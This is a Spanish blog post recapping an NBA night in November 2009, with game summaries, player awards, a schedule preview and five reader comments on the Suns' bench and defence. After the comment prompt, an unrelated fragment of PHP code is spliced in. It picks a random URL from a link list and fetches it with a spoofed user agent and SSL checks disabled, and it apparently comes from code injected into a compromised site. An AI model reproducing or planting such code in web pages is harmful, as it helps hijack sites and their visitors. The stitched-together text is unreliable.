La Crónica (09/11/09)

10 de November de 2009 por txusma

Se esperaba una noche tranquila y un tanto aburrida, sin duelos directos entre favoritos y muchos contrincantes de gama media-baja. Al final resulta que el espectáculo puede surgir de donde menos esperamos. Asistimos a casi 112,5 puntos de media por equipo que, sin entrar en aspectos tácticos que corresponde valorar a otros, los aficionados debemos agradecer casi siempre.

En el partido más ofensivo los Raptors le hicieron sudar a base de bien a unos Spurs sin Duncan ni Parker. Popovic implementó un small-ball para contrarrestar su inferioridad y se encomendó a San Manudo para salvar una situación que empezaba a respirarse viciada. Jefferson, Hill, Bonner…aguantaron al equipo, pero fue el viejo Ginobili quien destapó el tarro de las esencias como no veíamos desde que fue mejor Sexto.

Después los Warriors le endosaron casi 150 puntos a los Wolves. 8 tíos en dobles dígitos, Stephen Jackson inflándose a dar asistencias (hasta 15… extraña manera de forzar un traspaso), Azubuike, Ellis, Morrow y Randolph ametrallando como posesos. Viva “los Mundos de Yupi” de Nelson!!!

También vimos a Nash tocando la guitarra como sólo él sabe. 20 asistencias él solito (y no es la primera vez como todos sabemos) para remontar un partido que se puso duro en el Wachovia. Quien mejor lo agradece es Richardson que por fin parece haber encontrado su sitio en Phoenix.

Los Jazz sudaron para doblegar a los flojos Knicks y los Hornets tuvieron menos problemas de los esperados ante los Clippers. Los dos únicos equipos que lograron dejar a sus rivales por debajo de 100 anoche. A ver si logran reinventarse defensivamente. Falta les hace.

PREMIOS

MVP: En ausencia de Parker y Duncan, Manu Ginobili ha cogido la responsabilidad y ha liderado a los Spurs en la victoria frente los Raptors con 36 puntos, 4 rebotes, 8 asistencias y 4 tapones. Pero si la actuación del argentino ha sido espectacular, ¿qué podemos decir de la de Steve Nash? Como nos gusta que un jugador llegue a las 20 asistencias…

Rookie: Sin duda el draft de 2009 será recordado por la cantidad de buenos bases escogidos. Esta noche han destacado 3. Jrue Holiday, con una actuación completísima en los minutos que ha jugado, Johny Flynn, que mientras se recupera Al Jefferson sigue siendo el mejor de los Wolves y, como alguien indicaba hace poco en los comentarios, Toney Douglas. 21 puntitos y robándole tiempo a Duhon.

Sorpresa: Buen partido de Jared Dudley al que le han entrado 4 de los 5 triples que ha intentado. Buen partido también de Kirilenko (23 puntos, 6 rebotes y 6 asistencias) que confirma su rendimiento ascendente en este inicio de temporada. Y buen partido finalmente, de los secundarios de los Warriors pero sobretodo de Azubuike y los Anthony (74 puntos entre los 3).

Decepción: Al final acabaremos llamando a este premio el premio Baron Davis porque no hay manera de que el base de los Clippers levante la cabeza. En todo caso hoy le damos el premio a Julian Wright del que se esperaban grandes cosas este año y que no está cumpliendo, para nada, las expectativas. 0 puntos, 1 rebote y 1 asistencia contra los Clippers.

Esfuerzo en vano: Chris Bosh ha empezado la temporada en un gran estado de forma pero eso, a veces, no es suficiente para llevarse las victorias. Esta noche sus 32 puntos y 10 rebotes no han servido para mucho.

RAZONES PARA TRASNOCHAR

En una noche sin participación de Celtics, Lakers, Cavs o Spurs, los focos de atención se desplazan a territorios poco habituales. Por ejemplo, será interesante comprobar cómo reaccionan Orlando y Denver tras las humillaciones sufridas en OK City y Atlanta respectivamente. Ambos visitan dos pistas que todavía no han visto victorias forasteras: los Magic viajan a Charlotte (1h00) y los Nuggets, a Chicago (2h00). A las 2h30 viviremos un derbi texano, Mavs-Rockets, con ambos equipos clavando sus resultados: ambos perdieron en el debut y desde entonces han ganado 4 de 5 partidos. Enfrentarse a D-Wade no es el mejor remedio cuando uno está en crisis, como comprobarán a partir de la 1h30 horas unos Wizards que vienen de perder cuatro seguidos. Por último, a las 2h00, Rudy y Marc (Blazers y Grizzlies) se verán las caras a las 2h00 y la jornada la cerrarán Thunder y Kings a partir de las 4h00.

Comenta

5 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Phoenix está imparable, al igual que Nash, lástima que esta manera de jugar tan alegre y bonita para el espectador, no sirva para ganar anillos, a no ser que tengas un buen banquillo que permita dar descanso a los titulares (cosa que Phoenix no tiene ni ahora ni hace unos años con D’Antoni). Caso similar al de los Warriors, al menos espero que se metan en playoffs.
    Y los Spurs, sorprendiendo, ¡¡131 puntos!! sin Duncan. ¿Le habrán pasado a Popovich algun video de los Suns?

      Citar

  2. Viva_Dirk dice:
    #2

    Lo que les pasa a equipos como Phoenix es que se olvidan que de al baloncesto se juega en los 2 lados de la cancha, eso es lo que les faltó con D’Antoni y les sigue faltando ahora: defensa.

      Citar

  3. sergio dice:
    #3

    Hombre LOVE DENISE… hace un par de años si tenia buen banquillo y buenos titulares para aspirar al titulo:
    Shaq, Amare, Grant Hill, Raja Bell, Steve Nash, Barbosa, Boris Diaw, Giricek, Sean Marks,… recuerdo que el fichar a Shaq los convirtio en favoritos.

    Otra cosa es lo que dice Dirk… que defensa poquita… y mira que gente como Diaw, Bell, Hill o Amare estan muy capacitados para ello… desde luego a mi es el equipo que mas me ha gustado ver desde los Sacramento de Webber, Stojakovic, Bibby, Christie y Divac

      Citar

  4. Love Denise dice:
    #4

    sergio, desde mi punto de vista, ya se que los titulares son muy buenos, pero el banquillo no le da para aspirar a algo más, solo Barbosa como exto hombre y el resto no son muy fiables (Dudley, Collins, Amundson, Dragic, etc)

    Sean Marks y Giricek ?????? si estos dos tienen nivel LEB.
    Como ejemplo, hace un par de años, en la 2007-2008, el banquillo era Barbosa, Diaw (estos 2 si son buenos), pero el resto eran Marks, Giricek, DJ Strawberry, Piatkowski, Skinner, Tucker y Linton Johnson, no sabria decirte cuál de éstos es peor.

    De todas formas, sólo es mi opinión.

      Citar

  5. sergio dice:
    #5

    a mi Giricek, Diaw y Barbosa me parece una rotacion fiable aunque no completa… a ver si ahora hay que tener un Odom y un Wallace para tener buen banquillo. Me acuerdo de los primeros 3 anillos de los Bulls de Jordan. Alli no habia ni uno bueno como sexto hombre (exceptuando a Paxson, Perdue o Hodges quizas) pero el que saliese era para morder en defensa, no para hacer numeros. Por eso estaba de acuerdo con Dirk.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>